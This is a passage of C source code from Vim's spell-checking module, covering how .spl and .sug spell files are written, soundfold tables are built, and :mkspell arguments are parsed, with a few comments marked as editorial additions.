garray_T *gap;
fromto_T *ftp;
char_u *p;
int rr;
int retval = OK;
size_t fwv = 1; /* collect return value of fwrite() to avoid
warnings from picky compiler */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* <HEADER>: <fileID> <versionnr> */
/* <fileID> */
fwv &= fwrite(VIMSPELLMAGIC, VIMSPELLMAGICL, (size_t)1, fd);
if (fwv != (size_t)1)
/* Catch first write error, don't try writing more. */
goto theend;
putc(VIMSPELLVERSION, fd); /* <versionnr> */
/*
* <SECTIONS>: <section> ... <sectionend>
*/
/* SN_INFO: <infotext> */
if (spin->si_info != NULL)
{
putc(SN_INFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_info);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_info, (size_t)i, (size_t)1, fd); /* <infotext> */
}
/* SN_REGION: <regionname> ...
* Write the region names only if there is more than one. */
if (spin->si_region_count > 1)
{
putc(SN_REGION, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = spin->si_region_count * 2;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_region_name, (size_t)l, (size_t)1, fd);
/* <regionname> ... */
regionmask = (1 << spin->si_region_count) - 1;
}
else
regionmask = 0;
/* SN_CHARFLAGS: <charflagslen> <charflags> <folcharslen> <folchars>
*
* The table with character flags and the table for case folding.
* This makes sure the same characters are recognized as word characters
* when generating and when using a spell file.
* Skip this for ASCII, the table may conflict with the one used for
* 'encoding'.
* Also skip this for an .add.spl file, the main spell file must contain
* the table (this avoids conflicts). The file is shorter too.
*/
if (!spin->si_ascii && !spin->si_add)
{
char_u folchars[128 * 8];
int flags;
putc(SN_CHARFLAGS, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
/* Form the <folchars> string first, we need to know its length. */
l = 0;
for (i = 128; i < 256; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
l += mb_char2bytes(spelltab.st_fold[i], folchars + l);
else
#endif
folchars[l++] = spelltab.st_fold[i];
}
put_bytes(fd, (long_u)(1 + 128 + 2 + l), 4); /* <sectionlen> */
fputc(128, fd); /* <charflagslen> */
for (i = 128; i < 256; ++i)
{
flags = 0;
if (spelltab.st_isw[i])
flags |= CF_WORD;
if (spelltab.st_isu[i])
flags |= CF_UPPER;
fputc(flags, fd); /* <charflags> */
}
put_bytes(fd, (long_u)l, 2); /* <folcharslen> */
fwv &= fwrite(folchars, (size_t)l, (size_t)1, fd); /* <folchars> */
}
/* SN_MIDWORD: <midword> */
if (spin->si_midword != NULL)
{
putc(SN_MIDWORD, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_midword);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_midword, (size_t)i, (size_t)1, fd);
/* <midword> */
}
/* SN_PREFCOND: <prefcondcnt> <prefcond> ... */
if (spin->si_prefcond.ga_len > 0)
{
putc(SN_PREFCOND, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = write_spell_prefcond(NULL, &spin->si_prefcond);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
write_spell_prefcond(fd, &spin->si_prefcond);
}
/* SN_REP: <repcount> <rep> ...
* SN_SAL: <salflags> <salcount> <sal> ...
* SN_REPSAL: <repcount> <rep> ... */
/* round 1: SN_REP section
* round 2: SN_SAL section (unless SN_SOFO is used)
* round 3: SN_REPSAL section */
for (round = 1; round <= 3; ++round)
{
if (round == 1)
gap = &spin->si_rep;
else if (round == 2)
{
/* Don't write SN_SAL when using a SN_SOFO section */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
continue;
gap = &spin->si_sal;
}
else
gap = &spin->si_repsal;
/* Don't write the section if there are no items. */
if (gap->ga_len == 0)
continue;
/* Sort the REP/REPSAL items. */
if (round != 2)
qsort(gap->ga_data, (size_t)gap->ga_len,
sizeof(fromto_T), rep_compare);
i = round == 1 ? SN_REP : (round == 2 ? SN_SAL : SN_REPSAL);
putc(i, fd); /* <sectionID> */
/* This is for making suggestions, section is not required. */
putc(0, fd); /* <sectionflags> */
/* Compute the length of what follows. */
l = 2; /* count <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
l += 1 + (int)STRLEN(ftp->ft_from); /* count <*fromlen> and <*from> */
l += 1 + (int)STRLEN(ftp->ft_to); /* count <*tolen> and <*to> */
}
if (round == 2)
++l; /* count <salflags> */
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
if (round == 2)
{
i = 0;
if (spin->si_followup)
i |= SAL_F0LLOWUP;
if (spin->si_collapse)
i |= SAL_COLLAPSE;
if (spin->si_rem_accents)
i |= SAL_REM_ACCENTS;
putc(i, fd); /* <salflags> */
}
put_bytes(fd, (long_u)gap->ga_len, 2); /* <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
ftp = &((fromto_T *)gap->ga_data)[i];
for (rr = 1; rr <= 2; ++rr)
{
p = rr == 1 ? ftp->ft_from : ftp->ft_to;
l = (int)STRLEN(p);
putc(l, fd);
if (l > 0)
fwv &= fwrite(p, l, (size_t)1, fd);
}
}
}
/* SN_SOFO: <sofofromlen> <sofofrom> <sofotolen> <sofoto>
* This is for making suggestions, section is not required. */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
{
putc(SN_SOFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_sofofr);
put_bytes(fd, (long_u)(l + STRLEN(spin->si_sofoto) + 4), 4);
/* <sectionlen> */
put_bytes(fd, (long_u)l, 2); /* <sofofromlen> */
fwv &= fwrite(spin->si_sofofr, l, (size_t)1, fd); /* <sofofrom> */
l = (int)STRLEN(spin->si_sofoto);
put_bytes(fd, (long_u)l, 2); /* <sofotolen> */
fwv &= fwrite(spin->si_sofoto, l, (size_t)1, fd); /* <sofoto> */
}
/* SN_WORDS: <word> ...
* This is for making suggestions, section is not required. */
if (spin->si_commonwords.ht_used > 0)
{
putc(SN_WORDS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* round 1: count the bytes
* round 2: write the bytes */
for (round = 1; round <= 2; ++round)
{
int todo;
int len = 0;
hashitem_T *hi;
todo = (int)spin->si_commonwords.ht_used;
for (hi = spin->si_commonwords.ht_array; todo > 0; ++hi)
if (!HASHITEM_EMPTY(hi))
{
l = (int)STRLEN(hi->hi_key) + 1;
len += l;
if (round == 2) /* <word> */
fwv &= fwrite(hi->hi_key, (size_t)l, (size_t)1, fd);
--todo;
}
if (round == 1)
put_bytes(fd, (long_u)len, 4); /* <sectionlen> */
}
}
/* SN_MAP: <mapstr>
* This is for making suggestions, section is not required. */
if (spin->si_map.ga_len > 0)
{
putc(SN_MAP, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = spin->si_map.ga_len;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_map.ga_data, (size_t)l, (size_t)1, fd);
/* <mapstr> */
}
/* SN_SUGFILE: <timestamp>
* This is used to notify that a .sug file may be available and at the
* same time allows for checking that a .sug file that is found matches
* with this .spl file. That's because the word numbers must be exactly
* right. */
if (!spin->si_nosugfile
&& (spin->si_sal.ga_len > 0
|| (spin->si_sofofr != NULL && spin->si_sofoto != NULL)))
{
putc(SN_SUGFILE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)8, 4); /* <sectionlen> */
/* Set si_sugtime and write it to the file. */
spin->si_sugtime = time(NULL);
put_time(fd, spin->si_sugtime); /* <timestamp> */
}
/* SN_NOSPLITSUGS: nothing
* This is used to notify that no suggestions with word splits are to be
* made. */
if (spin->si_nosplitsugs)
{
putc(SN_NOSPLITSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_NOCOMPUNDSUGS: nothing
* This is used to notify that no suggestions with compounds are to be
* made. */
if (spin->si_nocompoundsugs)
{
putc(SN_NOCOMPOUNDSUGS, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_COMPOUND: compound info.
* We don't mark it required, when not supported all compound words will
* be bad words. */
if (spin->si_compflags != NULL)
{
putc(SN_COMPOUND, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_compflags);
for (i = 0; i < spin->si_comppat.ga_len; ++i)
l += (int)STRLEN(((char_u **)(spin->si_comppat.ga_data))[i]) + 1;
put_bytes(fd, (long_u)(l + 7), 4); /* <sectionlen> */
putc(spin->si_compmax, fd); /* <compmax> */
putc(spin->si_compminlen, fd); /* <compminlen> */
putc(spin->si_compsylmax, fd); /* <compsylmax> */
putc(0, fd); /* for Vim 7.0b compatibility */
putc(spin->si_compoptions, fd); /* <compoptions> */
put_bytes(fd, (long_u)spin->si_comppat.ga_len, 2);
/* <comppatcount> */
for (i = 0; i < spin->si_comppat.ga_len; ++i)
{
p = ((char_u **)(spin->si_comppat.ga_data))[i];
putc((int)STRLEN(p), fd); /* <comppatlen> */
fwv &= fwrite(p, (size_t)STRLEN(p), (size_t)1, fd);
/* <comppattext> */
}
/* <compflags> */
fwv &= fwrite(spin->si_compflags, (size_t)STRLEN(spin->si_compflags),
(size_t)1, fd);
}
/* SN_NOBREAK: NOBREAK flag */
if (spin->si_nobreak)
{
putc(SN_NOBREAK, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
/* It's empty, the presence of the section flags the feature. */
put_bytes(fd, (long_u)0, 4); /* <sectionlen> */
}
/* SN_SYLLABLE: syllable info.
* We don't mark it required, when not supported syllables will not be
* counted. */
if (spin->si_syllable != NULL)
{
putc(SN_SYLLABLE, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
l = (int)STRLEN(spin->si_syllable);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_syllable, (size_t)l, (size_t)1, fd);
/* <syllable> */
}
/* end of <SECTIONS> */
putc(SN_END, fd); /* <sectionend> */
/*
* <LWORDTREE> <KWORDTREE> <PREFIXTREE>
*/
spin->si_memtot = 0;
for (round = 1; round <= 3; ++round)
{
if (round == 1)
tree = spin->si_foldroot->wn_sibling;
else if (round == 2)
tree = spin->si_keeproot->wn_sibling;
else
tree = spin->si_prefroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, regionmask, round == 3);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, regionmask, round == 3);
}
/* Write another byte to check for errors (file system full). */
if (putc(0, fd) == EOF)
retval = FAIL;
theend:
if (fclose(fd) == EOF)
retval = FAIL;
if (fwv != (size_t)1)
retval = FAIL;
if (retval == FAIL)
EMSG(_(e_write));
return retval;
}
/*
* Clear the index and wnode fields of "node", its siblings and its
* children. This is needed because they are a union with other items to save
* space.
*/
static void
clear_node(wordnode_T *node)
{
wordnode_T *np;
if (node != NULL)
for (np = node; np != NULL; np = np->wn_sibling)
{
np->wn_u1.index = 0;
np->wn_u2.wnode = NULL;
if (np->wn_byte != NUL)
clear_node(np->wn_child);
}
}
/*
* Dump a word tree at node "node".
*
* This first writes the list of possible bytes (siblings). Then for each
* byte recursively write the children.
*
* NOTE: The code here must match the code in read_tree_node(), since
* assumptions are made about the indexes (so that we don't have to write them
* in the file).
*
* Returns the number of nodes used.
*/
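/*
 * Format sketch (editorial addition), derived from the code below.  Each
 * node (one sibling list) is written as <siblingcount> followed by one item
 * per sibling:
 *
 *	BY_NOFLAGS                          end of word, nothing extra
 *	BY_FLAGS  <flags> [<region>] [<affixID>]
 *	BY_FLAGS2 <flags> <flags2> [<region>] [<affixID>]
 *	BY_INDEX  <nodeidx>                 child written earlier, 3-byte index
 *	<byte>                              ordinary byte, child follows later
 *
 * In the PREFIXTREE an end-of-word item instead carries an optional <pflags>,
 * the <affixID> and a 2-byte <prefcondnr>.
 */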
static int
put_node(
FILE *fd, /* NULL when only counting */
wordnode_T *node,
int idx,
int regionmask,
int prefixtree) /* TRUE for PREFIXTREE */
{
int newindex = idx;
int siblingcount = 0;
wordnode_T *np;
int flags;
/* If "node" is zero the tree is empty. */
if (node == NULL)
return 0;
/* Store the index where this node is written. */
node->wn_u1.index = idx;
/* Count the number of siblings. */
for (np = node; np != NULL; np = np->wn_sibling)
++siblingcount;
/* Write the sibling count. */
if (fd != NULL)
putc(siblingcount, fd); /* <siblingcount> */
/* Write each sibling byte and optionally extra info. */
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == 0)
{
if (fd != NULL)
{
/* For a NUL byte (end of word) write the flags etc. */
if (prefixtree)
{
/* In PREFIXTREE write the required affixID and the
* associated condition nr (stored in wn_region). The
* byte value is misused to store the "rare" and "not
* combining" flags */
if (np->wn_flags == (short_u)PFX_FLAGS)
putc(BY_NOFLAGS, fd); /* <byte> */
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(np->wn_flags, fd); /* <pflags> */
}
putc(np->wn_affixID, fd); /* <affixID> */
put_bytes(fd, (long_u)np->wn_region, 2); /* <prefcondnr> */
}
else
{
/* For word trees we write the flag/region items. */
flags = np->wn_flags;
if (regionmask != 0 && np->wn_region != regionmask)
flags |= WF_REGION;
if (np->wn_affixID != 0)
flags |= WF_AFX;
if (flags == 0)
{
/* word without flags or region */
putc(BY_NOFLAGS, fd); /* <byte> */
}
else
{
if (np->wn_flags >= 0x100)
{
putc(BY_FLAGS2, fd); /* <byte> */
putc(flags, fd); /* <flags> */
putc((unsigned)flags >> 8, fd); /* <flags2> */
}
else
{
putc(BY_FLAGS, fd); /* <byte> */
putc(flags, fd); /* <flags> */
}
if (flags & WF_REGION)
putc(np->wn_region, fd); /* <region> */
if (flags & WF_AFX)
putc(np->wn_affixID, fd); /* <affixID> */
}
}
}
}
else
{
if (np->wn_child->wn_u1.index != 0
&& np->wn_child->wn_u2.wnode != node)
{
/* The child is written elsewhere, write the reference. */
if (fd != NULL)
{
putc(BY_INDEX, fd); /* <byte> */
/* <nodeidx> */
put_bytes(fd, (long_u)np->wn_child->wn_u1.index, 3);
}
}
else if (np->wn_child->wn_u2.wnode == NULL)
/* We will write the child below and give it an index. */
np->wn_child->wn_u2.wnode = node;
if (fd != NULL)
if (putc(np->wn_byte, fd) == EOF) /* <byte> or <xbyte> */
{
EMSG(_(e_write));
return 0;
}
}
}
/* Space used in the array when reading: one for each sibling and one for
* the count. */
newindex += siblingcount + 1;
/* Recursively dump the children of each sibling. */
for (np = node; np != NULL; np = np->wn_sibling)
if (np->wn_byte != 0 && np->wn_child->wn_u2.wnode == node)
newindex = put_node(fd, np->wn_child, newindex, regionmask,
prefixtree);
return newindex;
}
/*
* ":mkspell [-ascii] outfile infile ..."
* ":mkspell [-ascii] addfile"
*/
void
ex_mkspell(exarg_T *eap)
{
int fcount;
char_u **fnames;
char_u *arg = eap->arg;
int ascii = FALSE;
if (STRNCMP(arg, "-ascii", 6) == 0)
{
ascii = TRUE;
arg = skipwhite(arg + 6);
}
/* Expand all the remaining arguments (e.g., $VIMRUNTIME). */
if (get_arglist_exp(arg, &fcount, &fnames, FALSE) == OK)
{
mkspell(fcount, fnames, ascii, eap->forceit, FALSE);
FreeWild(fcount, fnames);
}
}
/*
* Create the .sug file.
* Uses the soundfold info in "spin".
* Writes the file with the name "wfname", with ".spl" changed to ".sug".
*/
static void
spell_make_sugfile(spellinfo_T *spin, char_u *wfname)
{
char_u *fname = NULL;
int len;
slang_T *slang;
int free_slang = FALSE;
/*
* Read back the .spl file that was written. This fills the required
* info for soundfolding. This also uses less memory than the
* pointer-linked version of the trie. And it avoids having two versions
* of the code for the soundfolding stuff.
* It might have been done already by spell_reload_one().
*/
for (slang = first_lang; slang != NULL; slang = slang->sl_next)
if (fullpathcmp(wfname, slang->sl_fname, FALSE) == FPC_SAME)
break;
if (slang == NULL)
{
spell_message(spin, (char_u *)_("Reading back spell file..."));
slang = spell_load_file(wfname, NULL, NULL, FALSE);
if (slang == NULL)
return;
free_slang = TRUE;
}
/*
* Clear the info in "spin" that is used.
*/
spin->si_blocks = NULL;
spin->si_blocks_cnt = 0;
spin->si_compress_cnt = 0; /* will stay at 0 all the time */
spin->si_free_count = 0;
spin->si_first_free = NULL;
spin->si_foldwcount = 0;
/*
* Go through the trie of good words, soundfold each word and add it to
* the soundfold trie.
*/
spell_message(spin, (char_u *)_("Performing soundfolding..."));
if (sug_filltree(spin, slang) == FAIL)
goto theend;
/*
* Create the table which links each soundfold word with a list of the
* good words it may come from. Creates buffer "spin->si_spellbuf".
* This also removes the wordnr from the NUL byte entries to make
* compression possible.
*/
if (sug_maketable(spin) == FAIL)
goto theend;
smsg((char_u *)_("Number of words after soundfolding: %ld"),
(long)spin->si_spellbuf->b_ml.ml_line_count);
/*
* Compress the soundfold trie.
*/
spell_message(spin, (char_u *)_(msg_compressing));
wordtree_compress(spin, spin->si_foldroot);
/*
* Write the .sug file.
* Make the file name by changing ".spl" to ".sug".
*/
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
vim_strncpy(fname, wfname, MAXPATHL - 1);
len = (int)STRLEN(fname);
fname[len - 2] = 'u';
fname[len - 1] = 'g';
sug_write(spin, fname);
theend:
vim_free(fname);
if (free_slang)
slang_free(slang);
free_blocks(spin->si_blocks);
close_spellbuf(spin->si_spellbuf);
}
/*
* Build the soundfold trie for language "slang".
*/
static int
sug_filltree(spellinfo_T *spin, slang_T *slang)
{
char_u *byts;
idx_T *idxs;
int depth;
idx_T arridx[MAXWLEN];
int curi[MAXWLEN];
char_u tword[MAXWLEN];
char_u tsalword[MAXWLEN];
int c;
idx_T n;
unsigned words_done = 0;
int wordcount[MAXWLEN];
/* We use si_foldroot for the soundfolded trie. */
spin->si_foldroot = wordtree_alloc(spin);
if (spin->si_foldroot == NULL)
return FAIL;
/* let tree_add_word() know we're adding to the soundfolded tree */
spin->si_sugtree = TRUE;
/*
* Go through the whole case-folded tree, soundfold each word and put it
* in the trie.
*/
byts = slang->sl_fbyts;
idxs = slang->sl_fidxs;
arridx[0] = 0;
curi[0] = 1;
wordcount[0] = 0;
depth = 0;
while (depth >= 0 && !got_int)
{
if (curi[depth] > byts[arridx[depth]])
{
/* Done all bytes at this node, go up one level. */
idxs[arridx[depth]] = wordcount[depth];
if (depth > 0)
wordcount[depth - 1] += wordcount[depth];
--depth;
line_breakcheck();
}
else
{
/* Do one more byte at this node. */
n = arridx[depth] + curi[depth];
++curi[depth];
c = byts[n];
if (c == 0)
{
/* Sound-fold the word. */
tword[depth] = NUL;
spell_soundfold(slang, tword, TRUE, tsalword);
/* We use the "flags" field for the MSB of the wordnr,
* "region" for the LSB of the wordnr. */
if (tree_add_word(spin, tsalword, spin->si_foldroot,
words_done >> 16, words_done & 0xffff,
0) == FAIL)
return FAIL;
++words_done;
++wordcount[depth];
/* Reset the block count each time to avoid compression
* kicking in. */
spin->si_blocks_cnt = 0;
/* Skip over any other NUL bytes (same word with different
* flags). */
while (byts[n + 1] == 0)
{
++n;
++curi[depth];
}
}
else
{
/* Normal char, go one level deeper. */
tword[depth++] = c;
arridx[depth] = idxs[n];
curi[depth] = 1;
wordcount[depth] = 0;
}
}
}
smsg((char_u *)_("Total number of words: %d"), words_done);
return OK;
}
/*
* Make the table that links each word in the soundfold trie to the words it
* can be produced from.
* This is not unlike lines in a file, thus use a memfile to be able to access
* the table efficiently.
* Returns FAIL when out of memory.
*/
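/*
 * Illustrative sketch (editorial addition): line N of "spin->si_spellbuf"
 * roughly belongs to soundfolded word N and holds a NUL-terminated sequence
 * of good-word numbers, stored as deltas from the previous number and
 * encoded with offset2bytes() further down.
 */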
static int
sug_maketable(spellinfo_T *spin)
{
garray_T ga;
int res = OK;
/* Allocate a buffer, open a memline for it and create the swap file
* (uses a temp file, not a .swp file). */
spin->si_spellbuf = open_spellbuf();
if (spin->si_spellbuf == NULL)
return FAIL;
/* Use a buffer to store the line info, avoids allocating many small
* pieces of memory. */
ga_init2(&ga, 1, 100);
/* recursively go through the tree */
if (sug_filltable(spin, spin->si_foldroot->wn_sibling, 0, &ga) == -1)
res = FAIL;
ga_clear(&ga);
return res;
}
/*
* Fill the table for one node and its children.
* Returns the wordnr at the start of the node.
* Returns -1 when out of memory.
*/
static int
sug_filltable(
spellinfo_T *spin,
wordnode_T *node,
int startwordnr,
garray_T *gap) /* place to store line of numbers */
{
wordnode_T *p, *np;
int wordnr = startwordnr;
int nr;
int prev_nr;
for (p = node; p != NULL; p = p->wn_sibling)
{
if (p->wn_byte == NUL)
{
gap->ga_len = 0;
prev_nr = 0;
for (np = p; np != NULL && np->wn_byte == NUL; np = np->wn_sibling)
{
if (ga_grow(gap, 10) == FAIL)
return -1;
nr = (np->wn_flags << 16) + (np->wn_region & 0xffff);
/* Compute the offset from the previous nr and store the
* offset in a way that it takes a minimum number of bytes.
* It's a bit like utf-8, but without the need to mark
* following bytes. */
nr -= prev_nr;
prev_nr += nr;
gap->ga_len += offset2bytes(nr,
(char_u *)gap->ga_data + gap->ga_len);
}
/* add the NUL byte */
((char_u *)gap->ga_data)[gap->ga_len++] = NUL;
if (ml_append_buf(spin->si_spellbuf, (linenr_T)wordnr,
gap->ga_data, gap->ga_len, TRUE) == FAIL)
return -1;
++wordnr;
/* Remove extra NUL entries, we no longer need them. We don't
* bother freeing the nodes, they won't be reused anyway. */
while (p->wn_sibling != NULL && p->wn_sibling->wn_byte == NUL)
p->wn_sibling = p->wn_sibling->wn_sibling;
/* Clear the flags on the remaining NUL node, so that compression
* works a lot better. */
p->wn_flags = 0;
p->wn_region = 0;
}
else
{
wordnr = sug_filltable(spin, p->wn_child, wordnr, gap);
if (wordnr == -1)
return -1;
}
}
return wordnr;
}
/*
* Convert an offset into a minimal number of bytes.
* Similar to utf_char2bytes(), but use 8 bits in followup bytes and avoid NUL
* bytes.
*/
static int
offset2bytes(int nr, char_u *buf)
{
int rem;
int b1, b2, b3, b4;
/* Split the number in parts of base 255. We need to avoid NUL bytes. */
b1 = nr % 255 + 1;
rem = nr / 255;
b2 = rem % 255 + 1;
rem = rem / 255;
b3 = rem % 255 + 1;
b4 = rem / 255 + 1;
if (b4 > 1 || b3 > 0x1f) /* 4 bytes */
{
buf[0] = 0xe0 + b4;
buf[1] = b3;
buf[2] = b2;
buf[3] = b1;
return 4;
}
if (b3 > 1 || b2 > 0x3f ) /* 3 bytes */
{
buf[0] = 0xc0 + b3;
buf[1] = b2;
buf[2] = b1;
return 3;
}
if (b2 > 1 || b1 > 0x7f ) /* 2 bytes */
{
buf[0] = 0x80 + b2;
buf[1] = b1;
return 2;
}
/* 1 byte */
buf[0] = b1;
return 1;
}
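/*
 * Editorial sketch (not in the original source): a decoder matching the
 * encoding above, to make the byte layout concrete.  Vim's reading side has
 * an equivalent routine; the name "demo_bytes2offset" is hypothetical and
 * the block is not compiled.
 */
#if 0
static int
demo_bytes2offset(char_u **pp)
{
    char_u	*p = *pp;
    int		nr;
    int		c = *p++;

    if ((c & 0x80) == 0x00)		/* 1 byte:  0xxxxxxx */
	nr = c - 1;
    else if ((c & 0xc0) == 0x80)	/* 2 bytes: 10xxxxxx <byte> */
    {
	nr = (c & 0x3f) - 1;
	nr = nr * 255 + (*p++ - 1);
    }
    else if ((c & 0xe0) == 0xc0)	/* 3 bytes: 110xxxxx <byte> <byte> */
    {
	nr = (c & 0x1f) - 1;
	nr = nr * 255 + (*p++ - 1);
	nr = nr * 255 + (*p++ - 1);
    }
    else				/* 4 bytes: 1110xxxx <byte> <byte> <byte> */
    {
	nr = (c & 0x0f) - 1;
	nr = nr * 255 + (*p++ - 1);
	nr = nr * 255 + (*p++ - 1);
	nr = nr * 255 + (*p++ - 1);
    }
    *pp = p;
    return nr;
}
#endif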
/*
* Write the .sug file in "fname".
*/
static void
sug_write(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
wordnode_T *tree;
int nodecount;
int wcount;
char_u *line;
linenr_T lnum;
int len;
/* Create the file. Note that an existing file is silently overwritten! */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return;
}
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing suggestion file %s ..."), fname);
spell_message(spin, IObuff);
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
if (fwrite(VIMSUGMAGIC, VIMSUGMAGICL, (size_t)1, fd) != 1) /* <fileID> */
{
EMSG(_(e_write));
goto theend;
}
putc(VIMSUGVERSION, fd); /* <versionnr> */
/* Write si_sugtime to the file. */
put_time(fd, spin->si_sugtime); /* <timestamp> */
/*
* <SUGWORDTREE>
*/
spin->si_memtot = 0;
tree = spin->si_foldroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, 0, FALSE);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, 0, FALSE);
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*/
wcount = spin->si_spellbuf->b_ml.ml_line_count;
put_bytes(fd, (long_u)wcount, 4); /* <sugwcount> */
for (lnum = 1; lnum <= (linenr_T)wcount; ++lnum)
{
/* <sugline>: <sugnr> ... NUL */
line = ml_get_buf(spin->si_spellbuf, lnum, FALSE);
len = (int)STRLEN(line) + 1;
if (fwrite(line, (size_t)len, (size_t)1, fd) == 0)
{
EMSG(_(e_write));
goto theend;
}
spin->si_memtot += len;
}
/* Write another byte to check for errors. */
if (putc(0, fd) == EOF)
EMSG(_(e_write));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin->si_memtot);
spell_message(spin, IObuff);
theend:
/* close the file */
fclose(fd);
}
/*
* Create a Vim spell file from one or more word lists.
* "fnames[0]" is the output file name.
* "fnames[fcount - 1]" is the last input file name.
* Exception: when "fnames[0]" ends in ".add" it's used as the input file name
* and ".spl" is appended to make the output file name.
*/
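/*
 * Usage sketch (editorial addition; the encoding part of the name depends on
 * 'encoding'):
 *	:mkspell /tmp/nl nl_NL		reads nl_NL.aff + nl_NL.dic (or a plain
 *					word list), writes /tmp/nl.<enc>.spl
 *	:mkspell! en en_US en_CA	two region files, regions "usca",
 *					writes en.<enc>.spl; "!" overwrites
 */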
void
mkspell(
int fcount,
char_u **fnames,
int ascii, /* -ascii argument given */
int over_write, /* overwrite existing output file */
int added_word) /* invoked through "zg" */
{
char_u *fname = NULL;
char_u *wfname;
char_u **innames;
int incount;
afffile_T *(afile[8]);
int i;
int len;
stat_T st;
int error = FALSE;
spellinfo_T spin;
vim_memset(&spin, 0, sizeof(spin));
spin.si_verbose = !added_word;
spin.si_ascii = ascii;
spin.si_followup = TRUE;
spin.si_rem_accents = TRUE;
ga_init2(&spin.si_rep, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_repsal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_sal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_map, (int)sizeof(char_u), 100);
ga_init2(&spin.si_comppat, (int)sizeof(char_u *), 20);
ga_init2(&spin.si_prefcond, (int)sizeof(char_u *), 50);
hash_init(&spin.si_commonwords);
spin.si_newcompID = 127; /* start compound ID at first maximum */
/* default: fnames[0] is output file, following are input files */
innames = &fnames[1];
incount = fcount - 1;
wfname = alloc(MAXPATHL);
if (wfname == NULL)
return;
if (fcount >= 1)
{
len = (int)STRLEN(fnames[0]);
if (fcount == 1 && len > 4 && STRCMP(fnames[0] + len - 4, ".add") == 0)
{
/* For ":mkspell path/en.latin1.add" output file is
* "path/en.latin1.add.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, "%s.spl", fnames[0]);
}
else if (fcount == 1)
{
/* For ":mkspell path/vim" output file is "path/vim.latin1.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
}
else if (len > 4 && STRCMP(fnames[0] + len - 4, ".spl") == 0)
{
/* Name ends in ".spl", use as the file name. */
vim_strncpy(wfname, fnames[0], MAXPATHL - 1);
}
else
/* Name should be language, make the file name from it. */
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
/* Check for .ascii.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ASCII) != NULL)
spin.si_ascii = TRUE;
/* Check for .add.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ADD) != NULL)
spin.si_add = TRUE;
}
if (incount <= 0)
EMSG(_(e_invarg)); /* need at least output and input names */
else if (vim_strchr(gettail(wfname), '_') != NULL)
EMSG(_("E751: Output file name must not have region name"));
else if (incount > 8)
